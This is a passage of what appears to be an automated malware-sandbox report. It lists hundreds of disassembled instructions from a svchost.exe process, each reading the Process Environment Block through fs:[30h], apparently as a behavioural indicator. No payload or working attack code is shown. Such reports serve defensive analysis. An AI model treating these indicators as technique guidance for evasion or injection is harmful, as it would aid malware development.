                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
